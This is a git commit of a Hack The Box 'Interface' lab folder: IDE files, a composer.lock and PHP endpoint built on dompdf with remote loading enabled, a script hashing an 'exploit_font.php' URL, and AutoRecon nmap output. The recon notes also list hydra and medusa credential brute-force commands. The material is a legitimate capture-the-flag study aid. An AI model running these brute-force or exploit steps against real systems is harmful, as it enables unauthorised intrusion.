init htb

old htb folders

HTB/interface/.idea/.gitignore

@@ -0,0 +1,3 @@
+# Default ignored files
+/shelf/
+/workspace.xml

HTB/interface/.idea/inspectionProfiles/profiles_settings.xml

@@ -0,0 +1,6 @@
+<component name="InspectionProjectProfileManager">
+  <settings>
+    <option name="USE_PROJECT_PROFILE" value="false" />
+    <version value="1.0" />
+  </settings>
+</component>

HTB/interface/.idea/interface.iml

@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module type="PYTHON_MODULE" version="4">
+  <component name="NewModuleRootManager">
+    <content url="file://$MODULE_DIR$" />
+    <orderEntry type="inheritedJdk" />
+    <orderEntry type="sourceFolder" forTests="false" />
+  </component>
+</module>

HTB/interface/.idea/misc.xml

@@ -0,0 +1,7 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="ProjectRootManager" version="2" project-jdk-name="Python 3.11" project-jdk-type="Python SDK" />
+  <component name="PyCharmProfessionalAdvertiser">
+    <option name="shown" value="true" />
+  </component>
+</project>

HTB/interface/.idea/modules.xml

@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="ProjectModuleManager">
+    <modules>
+      <module fileurl="file://$PROJECT_DIR$/.idea/interface.iml" filepath="$PROJECT_DIR$/.idea/interface.iml" />
+    </modules>
+  </component>
+</project>

HTB/interface/.idea/vcs.xml

@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="VcsDirectoryMappings">
+    <mapping directory="$PROJECT_DIR$/.." vcs="Git" />
+  </component>
+</project>

HTB/interface/ape.py

@@ -0,0 +1,4 @@
+import hashlib
+
+print(hashlib.md5('http://localhost:9001/exploit_font.php'.encode()).hexdigest())
+

HTB/interface/cleaner.sh

@@ -0,0 +1,7 @@
+#!/bin/bash
+
+meta_producer=$(/usr/bin/exiftool -s -s -s -Producer "lol" 2>/dev/null | cut -d " " -f1)
+echo "$meta_producer"
+if [[ "$meta_producer" -eq "dompdf" ]]; then
+	echo "Removing $cfile"
+fi

HTB/interface/composer.lock

@@ -0,0 +1,280 @@
+{
+    "_readme": [
+        "This file locks the dependencies of your project to a known state",
+        "Read more about it at https://getcomposer.org/doc/01-basic-usage.md#installing-dependencies",
+        "This file is @generated automatically"
+    ],
+    "content-hash": "fcb4a045c36c74d5bd04940944865ee6",
+    "packages": [
+        {
+            "name": "bramus/router",
+            "version": "1.6.1",
+            "source": {
+                "type": "git",
+                "url": "https://github.com/bramus/router.git",
+                "reference": "55657b76da8a0a509250fb55b9dd24e1aa237eba"
+            },
+            "dist": {
+                "type": "zip",
+                "url": "https://api.github.com/repos/bramus/router/zipball/55657b76da8a0a509250fb55b9dd24e1aa237eba",
+                "reference": "55657b76da8a0a509250fb55b9dd24e1aa237eba",
+                "shasum": ""
+            },
+            "require": {
+                "php": ">=5.3.0"
+            },
+            "require-dev": {
+                "friendsofphp/php-cs-fixer": "~2.14",
+                "phpunit/php-code-coverage": "~2.0",
+                "phpunit/phpunit": "~4.8"
+            },
+            "type": "library",
+            "autoload": {
+                "psr-0": {
+                    "Bramus": "src/"
+                }
+            },
+            "notification-url": "https://packagist.org/downloads/",
+            "license": [
+                "MIT"
+            ],
+            "authors": [
+                {
+                    "name": "Bram(us) Van Damme",
+                    "email": "bramus@bram.us",
+                    "homepage": "http://www.bram.us"
+                }
+            ],
+            "description": "A lightweight and simple object oriented PHP Router",
+            "homepage": "https://github.com/bramus/router",
+            "keywords": [
+                "router",
+                "routing"
+            ],
+            "support": {
+                "issues": "https://github.com/bramus/router/issues",
+                "source": "https://github.com/bramus/router/tree/1.6.1"
+            },
+            "time": "2021-11-18T19:24:07+00:00"
+        },
+        {
+            "name": "dompdf/dompdf",
+            "version": "v1.2.0",
+            "source": {
+                "type": "git",
+                "url": "https://github.com/dompdf/dompdf.git",
+                "reference": "60b704331479a69e9bcdb3496da2315b5c4f94fd"
+            },
+            "dist": {
+                "type": "zip",
+                "url": "https://api.github.com/repos/dompdf/dompdf/zipball/60b704331479a69e9bcdb3496da2315b5c4f94fd",
+                "reference": "60b704331479a69e9bcdb3496da2315b5c4f94fd",
+                "shasum": ""
+            },
+            "require": {
+                "ext-dom": "*",
+                "ext-mbstring": "*",
+                "phenx/php-font-lib": "^0.5.4",
+                "phenx/php-svg-lib": "^0.3.3 || ^0.4.0",
+                "php": "^7.1 || ^8.0"
+            },
+            "require-dev": {
+                "mockery/mockery": "^1.3",
+                "phpunit/phpunit": "^7.5 || ^8 || ^9",
+                "squizlabs/php_codesniffer": "^3.5"
+            },
+            "suggest": {
+                "ext-gd": "Needed to process images",
+                "ext-gmagick": "Improves image processing performance",
+                "ext-imagick": "Improves image processing performance",
+                "ext-zlib": "Needed for pdf stream compression"
+            },
+            "type": "library",
+            "autoload": {
+                "psr-4": {
+                    "Dompdf\\": "src/"
+                },
+                "classmap": [
+                    "lib/"
+                ]
+            },
+            "notification-url": "https://packagist.org/downloads/",
+            "license": [
+                "LGPL-2.1"
+            ],
+            "authors": [
+                {
+                    "name": "Fabien Ménager",
+                    "email": "fabien.menager@gmail.com"
+                },
+                {
+                    "name": "Brian Sweeney",
+                    "email": "eclecticgeek@gmail.com"
+                },
+                {
+                    "name": "Gabriel Bull",
+                    "email": "me@gabrielbull.com"
+                }
+            ],
+            "description": "DOMPDF is a CSS 2.1 compliant HTML to PDF converter",
+            "homepage": "https://github.com/dompdf/dompdf",
+            "support": {
+                "issues": "https://github.com/dompdf/dompdf/issues",
+                "source": "https://github.com/dompdf/dompdf/tree/v1.2.0"
+            },
+            "time": "2022-02-07T13:02:10+00:00"
+        },
+        {
+            "name": "phenx/php-font-lib",
+            "version": "0.5.4",
+            "source": {
+                "type": "git",
+                "url": "https://github.com/dompdf/php-font-lib.git",
+                "reference": "dd448ad1ce34c63d09baccd05415e361300c35b4"
+            },
+            "dist": {
+                "type": "zip",
+                "url": "https://api.github.com/repos/dompdf/php-font-lib/zipball/dd448ad1ce34c63d09baccd05415e361300c35b4",
+                "reference": "dd448ad1ce34c63d09baccd05415e361300c35b4",
+                "shasum": ""
+            },
+            "require": {
+                "ext-mbstring": "*"
+            },
+            "require-dev": {
+                "symfony/phpunit-bridge": "^3 || ^4 || ^5"
+            },
+            "type": "library",
+            "autoload": {
+                "psr-4": {
+                    "FontLib\\": "src/FontLib"
+                }
+            },
+            "notification-url": "https://packagist.org/downloads/",
+            "license": [
+                "LGPL-3.0"
+            ],
+            "authors": [
+                {
+                    "name": "Fabien Ménager",
+                    "email": "fabien.menager@gmail.com"
+                }
+            ],
+            "description": "A library to read, parse, export and make subsets of different types of font files.",
+            "homepage": "https://github.com/PhenX/php-font-lib",
+            "support": {
+                "issues": "https://github.com/dompdf/php-font-lib/issues",
+                "source": "https://github.com/dompdf/php-font-lib/tree/0.5.4"
+            },
+            "time": "2021-12-17T19:44:54+00:00"
+        },
+        {
+            "name": "phenx/php-svg-lib",
+            "version": "0.4.1",
+            "source": {
+                "type": "git",
+                "url": "https://github.com/dompdf/php-svg-lib.git",
+                "reference": "4498b5df7b08e8469f0f8279651ea5de9626ed02"
+            },
+            "dist": {
+                "type": "zip",
+                "url": "https://api.github.com/repos/dompdf/php-svg-lib/zipball/4498b5df7b08e8469f0f8279651ea5de9626ed02",
+                "reference": "4498b5df7b08e8469f0f8279651ea5de9626ed02",
+                "shasum": ""
+            },
+            "require": {
+                "ext-mbstring": "*",
+                "php": "^7.1 || ^7.2 || ^7.3 || ^7.4 || ^8.0",
+                "sabberworm/php-css-parser": "^8.4"
+            },
+            "require-dev": {
+                "phpunit/phpunit": "^7.5 || ^8.5 || ^9.5"
+            },
+            "type": "library",
+            "autoload": {
+                "psr-4": {
+                    "Svg\\": "src/Svg"
+                }
+            },
+            "notification-url": "https://packagist.org/downloads/",
+            "license": [
+                "LGPL-3.0"
+            ],
+            "authors": [
+                {
+                    "name": "Fabien Ménager",
+                    "email": "fabien.menager@gmail.com"
+                }
+            ],
+            "description": "A library to read, parse and export to PDF SVG files.",
+            "homepage": "https://github.com/PhenX/php-svg-lib",
+            "support": {
+                "issues": "https://github.com/dompdf/php-svg-lib/issues",
+                "source": "https://github.com/dompdf/php-svg-lib/tree/0.4.1"
+            },
+            "time": "2022-03-07T12:52:04+00:00"
+        },
+        {
+            "name": "sabberworm/php-css-parser",
+            "version": "8.4.0",
+            "source": {
+                "type": "git",
+                "url": "https://github.com/sabberworm/PHP-CSS-Parser.git",
+                "reference": "e41d2140031d533348b2192a83f02d8dd8a71d30"
+            },
+            "dist": {
+                "type": "zip",
+                "url": "https://api.github.com/repos/sabberworm/PHP-CSS-Parser/zipball/e41d2140031d533348b2192a83f02d8dd8a71d30",
+                "reference": "e41d2140031d533348b2192a83f02d8dd8a71d30",
+                "shasum": ""
+            },
+            "require": {
+                "ext-iconv": "*",
+                "php": ">=5.6.20"
+            },
+            "require-dev": {
+                "codacy/coverage": "^1.4",
+                "phpunit/phpunit": "^4.8.36"
+            },
+            "suggest": {
+                "ext-mbstring": "for parsing UTF-8 CSS"
+            },
+            "type": "library",
+            "autoload": {
+                "psr-4": {
+                    "Sabberworm\\CSS\\": "src/"
+                }
+            },
+            "notification-url": "https://packagist.org/downloads/",
+            "license": [
+                "MIT"
+            ],
+            "authors": [
+                {
+                    "name": "Raphael Schweikert"
+                }
+            ],
+            "description": "Parser for CSS Files written in PHP",
+            "homepage": "https://www.sabberworm.com/blog/2010/6/10/php-css-parser",
+            "keywords": [
+                "css",
+                "parser",
+                "stylesheet"
+            ],
+            "support": {
+                "issues": "https://github.com/sabberworm/PHP-CSS-Parser/issues",
+                "source": "https://github.com/sabberworm/PHP-CSS-Parser/tree/8.4.0"
+            },
+            "time": "2021-12-11T13:40:54+00:00"
+        }
+    ],
+    "packages-dev": [],
+    "aliases": [],
+    "minimum-stability": "stable",
+    "stability-flags": [],
+    "prefer-stable": false,
+    "prefer-lowest": false,
+    "platform": [],
+    "platform-dev": [],
+    "plugin-api-version": "2.3.0"
+}

HTB/interface/index.php

@@ -0,0 +1,66 @@
+<?php
+
+require __DIR__ . '/vendor/autoload.php';
+
+use Dompdf\Dompdf;
+use Dompdf\Options;
+
+$router = new \Bramus\Router\Router();
+
+$router->set404('/api(/.*)?', function () {
+    header('HTTP/1.1 404 Not Found');
+    header('Content-Type: application/json');
+
+    $jsonArray = array();
+    $jsonArray['status'] = "404";
+    $jsonArray['status_text'] = "route not defined";
+
+    echo json_encode($jsonArray);
+});
+
+$router->post('/api/html2pdf', function () {
+
+    $json_data = json_decode(file_get_contents('php://input'), true);
+
+    if (isset($json_data['html'])) {
+
+        header($_SERVER["SERVER_PROTOCOL"] . " 200 OK");
+
+        $html = $json_data['html'];
+        $md5 = md5($html);
+
+        $attachment = sprintf("/tmp/%s.pdf", $md5);
+
+        if (!file_exists($attachment)) {
+
+            $options = new Options();
+            $options->setIsRemoteEnabled(true);
+
+            $dompdf = new Dompdf($options);
+            $dompdf->loadHtml($html);
+            $dompdf->setPaper('A5');
+            $dompdf->render();
+            $output = $dompdf->output();
+            file_put_contents($attachment, $output);
+
+            header("X-Local-Cache: miss");
+        } else {
+            header("X-Local-Cache: hit");
+        }
+
+        header("Cache-Control: public");
+        header("Content-Type: application/pdf");
+        header("Content-Transfer-Encoding: Binary");
+        header("Content-Length:" . filesize($attachment));
+        header("Content-Disposition: attachment; filename=export.pdf");
+        readfile($attachment);
+    } else {
+        header("HTTP/1.1 422 Unprocessable Entity");
+        header("Content-Type: application/json");
+        echo json_encode(array("status_text" => "missing parameters"));
+    }
+
+});
+
+$router->run();
+

HTB/interface/results/report/notes.txt

@@ -0,0 +1,8 @@
+[*] ssh found on tcp/22.
+
+
+
+[*] http found on tcp/80.
+
+
+

HTB/interface/results/report/report.md/interface.htb/Commands.md

@@ -0,0 +1,29 @@
+```bash
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/htb/interface/results/scans/_quick_tcp_nmap.txt" -oX "/home/simon/htb/interface/results/scans/xml/_quick_tcp_nmap.xml" interface.htb
+
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/htb/interface/results/scans/_full_tcp_nmap.txt" -oX "/home/simon/htb/interface/results/scans/xml/_full_tcp_nmap.xml" interface.htb
+
+nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/htb/interface/results/scans/_top_100_udp_nmap.txt" -oX "/home/simon/htb/interface/results/scans/xml/_top_100_udp_nmap.xml" interface.htb
+
+nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/simon/htb/interface/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/simon/htb/interface/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" interface.htb
+
+feroxbuster -u http://interface.htb:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
+
+curl -sSikf http://interface.htb:80/.well-known/security.txt
+
+curl -sSikf http://interface.htb:80/robots.txt
+
+curl -sSik http://interface.htb:80/
+
+nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/htb/interface/results/scans/tcp80/xml/tcp_80_http_nmap.xml" interface.htb
+
+curl -sk -o /dev/null -H "Host: wrkVpqvNoUJwGPBtPTqT.interface.htb" http://interface.htb:80/ -w "%{size_download}"
+
+whatweb --color=never --no-errors -a 3 -v http://interface.htb:80 2>&1
+
+wkhtmltoimage --format png http://interface.htb:80/ /home/simon/htb/interface/results/scans/tcp80/tcp_80_http_screenshot.png
+
+ffuf -u http://interface.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.interface.htb" -fs 6359 -noninteractive -s | tee "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_interface.htb_vhosts_subdomains-top1million-110000.txt"
+
+
+```

HTB/interface/results/report/report.md/interface.htb/Manual Commands.md

@@ -0,0 +1,35 @@
+```bash
+[*] ssh on tcp/22
+
+	[-] Bruteforce logins:
+
+		hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/simon/htb/interface/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://interface.htb
+
+		medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/simon/htb/interface/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h interface.htb
+
+[*] http on tcp/80
+
+	[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
+
+		feroxbuster -u http://interface.htb:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/htb/interface/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
+
+	[-] Credential bruteforcing commands (don't run these without modifying them):
+
+		hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://interface.htb/path/to/auth/area
+
+		medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h interface.htb -m DIR:/path/to/auth/area
+
+		hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://interface.htb/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
+
+		medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h interface.htb -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
+
+	[-] (nikto) old but generally reliable web server enumeration tool:
+
+		nikto -ask=no -h http://interface.htb:80 2>&1 | tee "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_nikto.txt"
+
+	[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
+
+		wpscan --url http://interface.htb:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_wpscan.txt"
+
+
+```

HTB/interface/results/report/report.md/interface.htb/Patterns.md

@@ -0,0 +1,4 @@
+Matched Pattern: Powered-By: Next.js
+
+Identified HTTP Server: nginx/1.14.0 (Ubuntu)
+

HTB/interface/results/report/report.md/interface.htb/Port Scans/PortScan - All TCP Ports.md

@@ -0,0 +1,62 @@
+```bash
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/htb/interface/results/scans/_full_tcp_nmap.txt" -oX "/home/simon/htb/interface/results/scans/xml/_full_tcp_nmap.xml" interface.htb
+```
+
+[/home/simon/htb/interface/results/scans/_full_tcp_nmap.txt](file:///home/simon/htb/interface/results/scans/_full_tcp_nmap.txt):
+
+```
+# Nmap 7.93 scan initiated Sat Feb 11 20:03:59 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/simon/htb/interface/results/scans/_full_tcp_nmap.txt -oX /home/simon/htb/interface/results/scans/xml/_full_tcp_nmap.xml interface.htb
+Nmap scan report for interface.htb (10.129.146.193)
+Host is up, received user-set (0.060s latency).
+Scanned at 2023-02-11 20:04:00 CET for 48s
+Not shown: 65533 closed tcp ports (reset)
+PORT   STATE SERVICE REASON         VERSION
+22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   2048 7289a0957eceaea8596b2d2dbc90b55a (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsUhYQQaT6D7Isd510Mjs3HcpUf64NWRgfkCDtCcPC3KjgNKdOByzhdgpqKftmogBoGPHDlfDboK5hTEm/6mqhbNQDhOiX1Y++AXwcgLAOpjfSExhKQSyKZVveZCl/JjB/th0YA12XJXECXl5GbNFtxDW6DnueLP5l0gWzFxJdtj7C57yai6MpHieKm564NOhsAqYqcxX8O54E9xUBW4u9n2vSM6ZnMutQiNSkfanyV0Pdo+yRWBY9TpfYHvt5A3qfcNbF3tMdQ6wddCPi98g+mEBdIbn1wQOvL0POpZ4DVg0asibwRAGo1NiUX3+dJDJbThkO7TeLyROvX/kostPH
+|   256 01848c66d34ec4b1611f2d4d389c42c3 (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGrQxMOFdtvAa9AGgwirSYniXm7NpzZbgIKhzgCOM1qwqK8QFkN6tZuQsCsRSzZ59+3l+Ycx5lTn11fbqLFqoqM=
+|   256 cc62905560a658629e6b80105c799b55 (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPtZ4bP4/4TJNGMNMmXWqt2dLijhttMoaeiJYJRJ4Kqy
+80/tcp open  http    syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
+|_http-title: Site Maintenance
+|_http-favicon: Unknown favicon MD5: 21B739D43FCB9BBB83D8541FE4FE88FA
+| http-methods: 
+|_  Supported Methods: GET HEAD
+|_http-server-header: nginx/1.14.0 (Ubuntu)
+OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
+Aggressive OS guesses: Linux 5.0 (93%), Linux 5.4 (93%), Linux 5.0 - 5.4 (93%), HP P2000 G3 NAS device (91%), Linux 4.15 - 5.6 (91%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Linux 5.0 - 5.3 (90%)
+No exact OS matches for host (test conditions non-ideal).
+TCP/IP fingerprint:
+SCAN(V=7.93%E=4%D=2/11%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63E7E6D0%P=x86_64-pc-linux-gnu)
+SEQ(SP=FE%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)
+OPS(O1=M569ST11NW7%O2=M569ST11NW7%O3=M569NNT11NW7%O4=M569ST11NW7%O5=M569ST11NW7%O6=M569ST11)
+WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
+ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M569NNSNW7%CC=Y%Q=)
+T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
+T2(R=N)
+T3(R=N)
+T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
+T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
+T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
+T7(R=N)
+U1(R=N)
+IE(R=Y%DFI=N%TG=40%CD=S)
+
+Uptime guess: 18.717 days (since Tue Jan 24 02:52:54 2023)
+Network Distance: 2 hops
+TCP Sequence Prediction: Difficulty=254 (Good luck!)
+IP ID Sequence Generation: All zeros
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+TRACEROUTE (using port 53/tcp)
+HOP RTT      ADDRESS
+1   77.01 ms 10.10.16.1
+2   77.09 ms interface.htb (10.129.146.193)
+
+Read data files from: /usr/bin/../share/nmap
+OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sat Feb 11 20:04:48 2023 -- 1 IP address (1 host up) scanned in 49.84 seconds
+
+```

HTB/interface/results/report/report.md/interface.htb/Port Scans/PortScan - Top 100 UDP Ports.md

@@ -0,0 +1,54 @@
+```bash
+nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/htb/interface/results/scans/_top_100_udp_nmap.txt" -oX "/home/simon/htb/interface/results/scans/xml/_top_100_udp_nmap.xml" interface.htb
+```
+
+[/home/simon/htb/interface/results/scans/_top_100_udp_nmap.txt](file:///home/simon/htb/interface/results/scans/_top_100_udp_nmap.txt):
+
+```
+# Nmap 7.93 scan initiated Sat Feb 11 20:03:59 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/simon/htb/interface/results/scans/_top_100_udp_nmap.txt -oX /home/simon/htb/interface/results/scans/xml/_top_100_udp_nmap.xml interface.htb
+Warning: 10.129.146.193 giving up on port because retransmission cap hit (6).
+Increasing send delay for 10.129.146.193 from 100 to 200 due to 11 out of 11 dropped probes since last increase.
+Increasing send delay for 10.129.146.193 from 200 to 400 due to 11 out of 11 dropped probes since last increase.
+Increasing send delay for 10.129.146.193 from 400 to 800 due to 11 out of 12 dropped probes since last increase.
+adjust_timeouts2: packet supposedly had rtt of -432739 microseconds.  Ignoring time.
+adjust_timeouts2: packet supposedly had rtt of -432739 microseconds.  Ignoring time.
+Nmap scan report for interface.htb (10.129.146.193)
+Host is up, received user-set (0.035s latency).
+Scanned at 2023-02-11 20:04:01 CET for 231s
+Not shown: 87 closed udp ports (port-unreach)
+PORT      STATE         SERVICE        REASON      VERSION
+17/udp    open|filtered qotd           no-response
+68/udp    open|filtered dhcpc          no-response
+80/udp    open|filtered http           no-response
+177/udp   open|filtered xdmcp          no-response
+593/udp   open|filtered http-rpc-epmap no-response
+631/udp   open|filtered ipp            no-response
+1029/udp  open|filtered solid-mux      no-response
+1719/udp  open|filtered h323gatestat   no-response
+3703/udp  open|filtered adobeserver-3  no-response
+4444/udp  open|filtered krb524         no-response
+32815/udp open|filtered unknown        no-response
+49154/udp open|filtered unknown        no-response
+65024/udp open|filtered unknown        no-response
+Too many fingerprints match this host to give specific OS details
+TCP/IP fingerprint:
+SCAN(V=7.93%E=4%D=2/11%OT=%CT=%CU=7%PV=Y%DS=2%DC=T%G=N%TM=63E7E788%P=x86_64-pc-linux-gnu)
+SEQ(CI=Z%II=I)
+SEQ(CI=Z)
+T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
+T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
+U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
+IE(R=Y%DFI=N%T=40%CD=S)
+
+Network Distance: 2 hops
+
+TRACEROUTE (using port 49192/udp)
+HOP RTT      ADDRESS
+1   33.86 ms 10.10.16.1
+2   33.95 ms interface.htb (10.129.146.193)
+
+Read data files from: /usr/bin/../share/nmap
+OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sat Feb 11 20:07:52 2023 -- 1 IP address (1 host up) scanned in 233.62 seconds
+
+```

HTB/interface/results/report/report.md/interface.htb/Port Scans/PortScan - Top TCP Ports.md

@@ -0,0 +1,69 @@
+```bash
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/htb/interface/results/scans/_quick_tcp_nmap.txt" -oX "/home/simon/htb/interface/results/scans/xml/_quick_tcp_nmap.xml" interface.htb
+```
+
+[/home/simon/htb/interface/results/scans/_quick_tcp_nmap.txt](file:///home/simon/htb/interface/results/scans/_quick_tcp_nmap.txt):
+
+```
+# Nmap 7.93 scan initiated Sat Feb 11 20:03:59 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/simon/htb/interface/results/scans/_quick_tcp_nmap.txt -oX /home/simon/htb/interface/results/scans/xml/_quick_tcp_nmap.xml interface.htb
+adjust_timeouts2: packet supposedly had rtt of -223229 microseconds.  Ignoring time.
+adjust_timeouts2: packet supposedly had rtt of -223229 microseconds.  Ignoring time.
+adjust_timeouts2: packet supposedly had rtt of -541797 microseconds.  Ignoring time.
+adjust_timeouts2: packet supposedly had rtt of -541797 microseconds.  Ignoring time.
+adjust_timeouts2: packet supposedly had rtt of -189731 microseconds.  Ignoring time.
+adjust_timeouts2: packet supposedly had rtt of -189731 microseconds.  Ignoring time.
+Nmap scan report for interface.htb (10.129.146.193)
+Host is up, received user-set (0.054s latency).
+Scanned at 2023-02-11 20:04:00 CET for 29s
+Not shown: 998 closed tcp ports (reset)
+PORT   STATE SERVICE REASON         VERSION
+22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   256 01848c66d34ec4b1611f2d4d389c42c3 (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGrQxMOFdtvAa9AGgwirSYniXm7NpzZbgIKhzgCOM1qwqK8QFkN6tZuQsCsRSzZ59+3l+Ycx5lTn11fbqLFqoqM=
+|   256 cc62905560a658629e6b80105c799b55 (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPtZ4bP4/4TJNGMNMmXWqt2dLijhttMoaeiJYJRJ4Kqy
+80/tcp open  http    syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
+|_http-title: Site Maintenance
+|_http-server-header: nginx/1.14.0 (Ubuntu)
+| http-methods: 
+|_  Supported Methods: GET HEAD
+|_http-favicon: Unknown favicon MD5: 21B739D43FCB9BBB83D8541FE4FE88FA
+Device type: general purpose
+Running (JUST GUESSING): Linux 5.X|2.6.X|4.X (88%)
+OS CPE: cpe:/o:linux:linux_kernel:5.0 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:4
+OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
+Aggressive OS guesses: Linux 5.0 (88%), Linux 5.0 - 5.4 (88%), Linux 2.6.32 (88%), Linux 5.4 (86%), Linux 4.15 - 5.6 (85%)
+No exact OS matches for host (test conditions non-ideal).
+TCP/IP fingerprint:
+SCAN(V=7.93%E=4%D=2/11%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63E7E6BD%P=x86_64-pc-linux-gnu)
+SEQ(SP=105%GCD=1%ISR=10C%TI=Z%TS=A)
+OPS(O1=M569ST11NW7%O2=M569ST11NW7%O3=M569NNT11NW7%O4=M569ST11NW7%O5=M569ST11NW7%O6=M569ST11)
+WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
+ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M569NNSNW7%CC=Y%Q=)
+T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
+T2(R=N)
+T3(R=N)
+T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
